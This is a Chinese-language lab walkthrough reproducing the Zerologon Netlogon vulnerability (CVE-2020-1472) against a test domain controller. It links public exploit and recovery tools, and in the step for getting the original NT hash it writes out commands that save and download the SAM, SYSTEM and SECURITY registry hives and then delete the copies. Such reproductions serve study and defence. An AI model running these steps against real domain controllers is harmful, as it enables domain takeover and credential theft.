CVE-2020-1472

0x00 CVE-2020-1472复现

NetLogon 特权提升漏洞

NetLogon组件 是 Windows 上一项重要的功能组件，用于用户和机器在域内网络上的认证，以及复制数据库以进行域控备份，同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时，存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

环境：

1.攻击机kali2020

2.靶机win2008r2---ip:192.168.124.141---主机名字：dc-01 ---域名：test.com

3.复现工具：https://github.com/dirkjanm/CVE-2020-1472

4.所需环境：python3+impacket包https://github.com/SecureAuthCorp/impacket

5.恢复工具：https://github.com/risksense/zerologon

0x01 复现过程

1. 下载复现工具，进行检验

2.获取hash值

安装impacket包

需要使用如下步骤：

git clonehttps://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

在刚才下载的包里面

impacket-master/examples

获取空口令

获取hash值

3. 获取shell

4. 获取域控的原始NT哈希

先在shell中执行以下命令，获取域控账户的注册表文件

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

在执行以下命令获取原始NT哈希

0x02．恢复

恢复脚本：https://github.com/risksense/zerologon

恢复需要使用哈希使用$MACHINE.ACC: 后的参数